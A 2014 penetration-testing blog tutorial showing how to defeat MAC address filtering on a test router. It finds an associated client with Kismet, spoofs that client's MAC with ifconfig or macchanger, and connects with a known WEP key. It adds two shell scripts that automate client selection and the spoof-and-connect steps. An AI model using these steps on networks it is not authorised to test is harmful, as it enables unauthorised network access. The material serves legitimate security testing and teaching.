Monday, February 3, 2014

Wireless Pentesting on the Cheap (Kali + TL-WN722N) - MAC Filtering

By Tony Lee

Introduction

In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and to attack a Wired Equivalent Privacy (WEP) network, a WPA Pre-Shared Key (PSK) network, and a network hiding its SSID, showcasing the abilities of this inexpensive and flexible setup.
In this article we will continue to test our setup by attacking a home router that is implementing MAC address filtering--walking you through the attack from start to finish.
Figure 1:  Our setup
Consult our previous WEP article for the following topics, which are omitted from this article due to similarity:
  • Equipment
    • Hardware
    • Software
  • Tips and tricks
    • Version of Workstation
    • Screen Resolution
    • Simple Text Editor
  • Connecting the USB Device

Outline

  • Preparation
  • Discovery
  • Attack
    • Explained
    • Find a Client
    • MAC spoof
      • ifconfig
      • macchanger
  • Connect
  • Countermeasures
  • Conclusion

Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks: left running, it keeps trying to manage wlan0 and can undo manual changes to the interface.  To prevent any interference, we will disable it ahead of time.

root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.


Discovery

In the previous article, we mentioned that the simplest way to ensure that the wireless card is working is to do some light discovery.  After all, the first step in a wireless engagement is to identify targets of interest.
Let’s enumerate the nearby networks with the iwlist command, which works while the card stays in “Managed” mode (no monitor mode needed yet).

root@kali:~# iwlist wlan0 scanning | grep -A 30 30:46:9A:16:ED:CE
         Cell 16 - Address: 30:46:9A:16:ED:CE
                   Channel:6
                   Frequency:2.437 GHz (Channel 6)
                   Quality=63/70  Signal level=-47 dBm  
                   Encryption key:on
                   ESSID:"QX3A7"
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                             9 Mb/s; 12 Mb/s; 18 Mb/s
                   Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                   Mode:Master
--snip--

Attack

For this scenario, we have discovered an access point using any of the encryption types covered in the earlier articles, and we either know or have actively recovered the information (key) required to connect to it.  However, even after entering the information correctly, we still cannot associate to the access point.


Figure 2:  No matter how many times we try to associate, the AP will not allow it
At this point we believe that the access point is performing MAC address filtering (aka whitelisting).  We will now look at how easy this is to set up and also examine ways that we can bypass this protection mechanism.

Explained

Access points can use MAC address filtering to prevent unknown hosts from connecting to the network.  Even our inexpensive Netgear router can utilize MAC address filtering--it is enabled through the Wireless Card Access List option as shown below:
Figure 3:  The Wireless Card Access List option in the Netgear router’s wireless settings; the “Setup Access List” button opens the MAC filtering configuration.
After clicking on the “Setup Access List” button, we are taken to another screen which allows us to turn the access control on and also add, edit, and delete devices contained within the access list.  In the screenshot below, we only have one client that is allowed to access this access point.
Figure 4:  Only one wireless card is authorized to connect to our test access point.
This may seem like a secure configuration; however, the key weakness in MAC address filtering is that a MAC address can be changed (spoofed) to any value an attacker wishes.  The administrator knows the list of approved clients, but the attacker generally does not know who is allowed to connect.  Since it is possible to discover clients that are already connected to an access point, the attacker can pick one of them to masquerade as.  Thus, an attacker must first find an already-associated client and then spoof its MAC address to connect to the access point.

Find a Client

This time we will use Kismet to find a wireless client.  We need far less information than in the previous article:
  • MAC address of a wireless client


root@kali:~# kismet -c wlan0



Figure 5:  Kismet allows us to easily find our wireless client to spoof

Examining the Kismet screenshot, we determined that the client MAC address that we want to spoof is:

24:77:03:8C:D3:44
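Kismet makes the client visible on screen, but for a scripted engagement it helps to pull the same information out of a file.  As an added example that is not part of the original post: airodump-ng (also on Kali) writes everything it sees to CSV when started with -w, and the station section of that file lists each client next to the BSSID it is associated to (or “(not associated)”).  The functions below list the clients of one BSSID, busiest first, and pick one to spoof.  The CSV here is a constructed sample in airodump-ng’s layout, not a capture from this article; the AP and victim MACs are the ones used above, the other stations are made up.

```shell
#!/bin/sh
# Added example, not from the original post: choose a client to spoof from an
# airodump-ng CSV instead of reading it off the Kismet screen.
# Assumption: airodump-ng was run with "-w capture", which writes capture-01.csv.
set -e

# list_clients BSSID CSVFILE
# Prints "station-MAC packets last-seen" for every client associated to BSSID,
# most talkative client first.  Fields are comma separated with variable
# padding, hence the ", *" field separator.
list_clients() {
    bssid=$(printf '%s' "$1" | tr 'a-f' 'A-F')
    awk -F', *' -v bssid="$bssid" '
        /^Station MAC/ { in_stations = 1; next }   # header of the station section
        in_stations && NF >= 6 && toupper($6) == bssid { print $1, $5, $3 }
    ' "$2" | sort -k2,2nr
}

# pick_client BSSID CSVFILE: just the MAC of the busiest associated client
pick_client() {
    list_clients "$1" "$2" | head -n 1 | cut -d' ' -f1
}

# Constructed sample in airodump-ng's CSV layout (not a capture from the post):
# one AP, two clients on it, one client on another AP, one unassociated probe.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, speed, privacy, cipher, authentication, power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
30:46:9A:16:ED:CE, 2014-02-03 10:00:01, 2014-02-03 10:05:12,  6,  54, WEP , WEP, ,  -47,      120,       35,   0.  0.  0.  0,   5, QX3A7, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
24:77:03:8C:D3:44, 2014-02-03 10:00:10, 2014-02-03 10:04:59,  -50,      210, 30:46:9A:16:ED:CE, QX3A7
00:11:22:33:44:55, 2014-02-03 10:02:30, 2014-02-03 10:03:01,  -61,       17, 30:46:9A:16:ED:CE, 
66:77:88:99:AA:BB, 2014-02-03 10:01:00, 2014-02-03 10:05:00,  -55,      300, 00:11:22:AA:BB:CC, OtherNet
CC:DD:EE:00:11:22, 2014-02-03 10:04:00, 2014-02-03 10:04:05,  -75,        3, (not associated), QX3A7
EOF

echo "Clients of 30:46:9A:16:ED:CE:"
list_clients 30:46:9A:16:ED:CE "$SAMPLE_CSV"
echo "Candidate to spoof: $(pick_client 30:46:9A:16:ED:CE "$SAMPLE_CSV")"
```

The packet count tells you which clients are really talking to the AP rather than merely probing for it; the last-seen column tells you which ones have gone quiet, which matters because (as noted in the Connect section) the attacker and the real client may not be able to hold an association with the same MAC at the same time.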




MAC Spoof

There are a couple of ways in which we can change our MAC address in Linux:
  • ifconfig
  • macchanger

ifconfig

The ifconfig command can be used to change our MAC address using the syntax below:

Syntax:
ifconfig <INT> down
ifconfig <INT> hw ether <XX:XX:XX:XX:XX:XX>
ifconfig <INT> up

Attack:
ifconfig wlan0 down
ifconfig wlan0 hw ether 24:77:03:8C:D3:44
ifconfig wlan0 up



Figure 6:  Changing the wireless card’s MAC address using ifconfig

macchanger

Macchanger is rightfully described in its man page as “a Linux utility for viewing/manipulating the MAC address for network interfaces”.  It is simple to use: it can set the hardware address to a random value or to one of your choosing.

Help:
root@kali:~# macchanger --help
GNU MAC Changer
Usage: macchanger [options] device

 -h,  --help                   Print this help
 -V,  --version                Print version and exit
 -s,  --show                   Print the MAC address and exit
 -e,  --ending                 Don't change the vendor bytes
 -a,  --another                Set random vendor MAC of the same kind
 -A                            Set random vendor MAC of any kind
 -p,  --permanent              Reset to original, permanent hardware MAC
 -r,  --random                 Set fully random MAC
 -l,  --list[=keyword]         Print known vendors
 -m,  --mac=XX:XX:XX:XX:XX:XX
      --mac XX:XX:XX:XX:XX:XX  Set the MAC XX:XX:XX:XX:XX:XX

Report bugs to alvaro@gnu.org

Syntax:
macchanger -m XX:XX:XX:XX:XX:XX wlan0

Attack:
macchanger -m 24:77:03:8C:D3:44 wlan0

Note that macchanger can only change the address of an interface that is down; if it complains that it cannot change the MAC, bring wlan0 down first (as in the ifconfig steps above) and rerun the command.



Figure 7:  Changing the wireless card’s MAC address using macchanger

Connect

Since we are using the WEP setup from the previous article (same WEP key) and we have spoofed the whitelisted client’s MAC address, we can finally connect to the access point using the command line steps outlined below:

Check the status of the card:
root@kali:~#  iwconfig wlan0

Enter the network information:
root@kali:~# iwconfig wlan0 essid "QX3A7" key 55:70:9E:69:0D:A0:9B:E1:18:DB:3A:7E:D9

Bring the Interface up:
root@kali:~# ifconfig wlan0 up

Check the Association:
root@kali:~# iwconfig wlan0

Obtain an IP:
root@kali:~# dhclient wlan0
Reloading /etc/samba/smb.conf: smbd only.

Verify an IP is obtained:
root@kali:~# ifconfig wlan0
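The steps above work, but typed one at a time they skip two checks that matter on a real engagement: that the MAC change actually took (the driver can silently refuse it) and that the association happened before dhclient is started.  As an added example that is not part of the original post, the script below wraps the ifconfig spoof and the iwconfig/dhclient connection into functions with those checks.  It assumes Kali with wireless-tools (ifconfig/iwconfig), NetworkManager already stopped as in the Preparation section, and a WEP network like the one used here; the script file name in the comment is hypothetical.

```shell
#!/bin/sh
# Added example, not from the original post: the MAC spoof and the connection
# steps as one script, with the checks the manual steps skip.
set -e

# valid_mac MAC: true if MAC is six colon-separated hex octets
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# mac_kind MAC: classify by the two low bits of the first octet.
# A real client's address is unicast-global; a multicast address cannot be
# assigned to an interface at all, so it is refused up front.
mac_kind() {
    first=$(printf '%s' "$1" | cut -d: -f1)
    val=$(( 0x$first ))
    if   [ $(( val & 1 )) -ne 0 ]; then echo multicast
    elif [ $(( val & 2 )) -ne 0 ]; then echo unicast-local
    else                                echo unicast-global
    fi
}

# current_mac IFACE: the address the kernel is using right now (lowercase)
current_mac() {
    cat "/sys/class/net/$1/address"
}

# spoof_mac IFACE MAC: validate, bring the interface down (most drivers reject
# "hw ether" while it is up), set the address, bring it back up and verify
# against sysfs rather than trusting ifconfig's exit status.
spoof_mac() {
    iface=$1; mac=$2
    valid_mac "$mac" || { echo "spoof_mac: bad MAC '$mac'" >&2; return 1; }
    [ "$(mac_kind "$mac")" != multicast ] || { echo "spoof_mac: refusing multicast MAC" >&2; return 1; }
    ifconfig "$iface" down
    ifconfig "$iface" hw ether "$mac"
    ifconfig "$iface" up
    want=$(printf '%s' "$mac" | tr 'A-F' 'a-f')
    got=$(current_mac "$iface")
    [ "$got" = "$want" ] || { echo "spoof_mac: $iface still has $got" >&2; return 1; }
    echo "$iface is now $got"
}

# join_wep IFACE ESSID HEXKEY: the iwconfig/dhclient steps, but wait for the
# association instead of assuming it, and fail loudly if it never happens
# (which is exactly what MAC filtering looks like from the client side).
join_wep() {
    iface=$1
    iwconfig "$iface" essid "$2" key "$3"
    ifconfig "$iface" up
    tries=0
    while iwconfig "$iface" | grep -q 'Not-Associated'; do
        tries=$((tries + 1))
        [ "$tries" -lt 10 ] || { echo "join_wep: not associated after 10s (still filtered?)" >&2; return 1; }
        sleep 1
    done
    dhclient "$iface"
    ifconfig "$iface" | grep 'inet addr'
}

# bypass_mac_filter IFACE CLIENT_MAC ESSID HEXKEY: the whole procedure
bypass_mac_filter() {
    spoof_mac "$1" "$2"
    join_wep "$1" "$3" "$4"
}

# Only act when given arguments (hypothetical file name), e.g.
#   sh mac_bypass.sh wlan0 24:77:03:8C:D3:44 QX3A7 55:70:9E:69:0D:A0:9B:E1:18:DB:3A:7E:D9
if [ "$#" -ge 4 ]; then
    bypass_mac_filter "$@"
fi
```

On distributions that have dropped ifconfig, the same spoof is `ip link set dev wlan0 down`, `ip link set dev wlan0 address 24:77:03:8C:D3:44`, `ip link set dev wlan0 up`; the sysfs check is unchanged.  If join_wep times out even though the key is right, remember the observation below: the real client may still be associated under that MAC.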




Figure 8:  Putting it all together:  Spoofing the MAC, connecting to the AP, pinging Google
One interesting thing to note is that the victim and the attacker could not be associated at the same time.  The Netgear router may have some additional logic that detects a second wireless client attempting to connect while one is already connected with the same MAC address.  We also tried changing the IP address of the second wireless client, but no dice.  In a multi-AP deployment (for example, thin APs managed by a controller) we would try associating to a different AP.  Once the victim disconnected, we were able to bypass MAC address filtering and access the Internet.  Access points handle this differently, so your mileage may vary.

Countermeasures

Although the intention of this article is not to warn about the dangers of relying on MAC address filtering as a sole means of security, it is worth noting.  MAC filtering on its own is security through obscurity; as part of a layered defense it can deter entry-level attackers.  The problem with using it as part of a layered defense in a corporate environment is that it does not scale well, because it usually requires manual configuration, so we rarely see it.  When it is used, it is on a select few networks that serve legacy clients (usually hand scanners or other one-off devices).

For networks that cannot utilize WPA-Enterprise, in addition to MAC filtering, we recommend the following additional defensive measures:
  • Turn off the network if it is no longer needed
  • Air gap the wireless network from the corporate network
  • Use WPA-PSK with a REALLY long and complex password - change frequently if possible
  • Segment the wireless network from the wired network via Firewall and IPS

Conclusion

In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by defeating MAC address filtering.  For just $16, and with no reboot required, you can place a wireless adapter into monitor mode and start assessing wireless networks.  More testing needs to be done with this setup to determine its other capabilities; as of right now, it appears to provide quick, portable, flexible, and inexpensive wireless testing.  Feedback below is always appreciated.
If you try this with different cards and run into issues, check the following excellent resource:  http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues

Special Thanks

Dan Dumond

Rudolph Araujo

2 comments:

  1. Another fine post Tony! Keep up the great educational & entertaining work!

    1. Thanks again for the feedback. Always appreciated.
